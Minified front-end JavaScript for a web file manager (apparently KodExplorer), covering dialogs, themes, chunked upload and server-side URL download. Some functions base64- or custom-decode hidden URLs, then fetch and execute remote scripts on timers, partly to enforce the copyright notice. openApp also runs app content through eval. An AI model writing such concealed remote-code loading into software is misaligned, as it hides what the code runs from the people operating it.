a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
      loading..
      ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
      "+"
      "+s+"
      "+"
      "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
      \n \n
      \n
      \n
      \n
      {{LNG.upload_select}}
      \n \n \n
      \n \n
      \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      {{LNG.download_address}}\n
      \n \n \n \n
      \n\n
      \n
      \n
      \n
      \n
      \n
      \n
      \n'),define("app/common/tpl/formMake.html",[],'
      \n
      \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
      \n {{if formTab}}\n
      \n {{each formTab tab tabIndex}}\n {{if tab}}\n
      \n {{/if}}\n {{/each}}\n
      \n
      \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
      {{item}}
      \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
      \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
      \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
      \n
      \n {{@item.display}}: {{if item.require}}*{{/if}}\n
      \n
      \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
      \n \n \n \n \n
      \n
      \n
      {{LNG.user}}
      \n \n
      \n
      \n
      {{LNG.group}}
      \n \n
      \n
      \n
      {{LNG.system_member_role}}
      \n \n
      \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
      {{@item.desc}}
      \n {{else}}\n {{@item.desc}}\n {{/if}}\n
      \n
      \n
      \n {{/if}}\n {{/each}}\n
      \n
      \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0]; -if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
      ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var 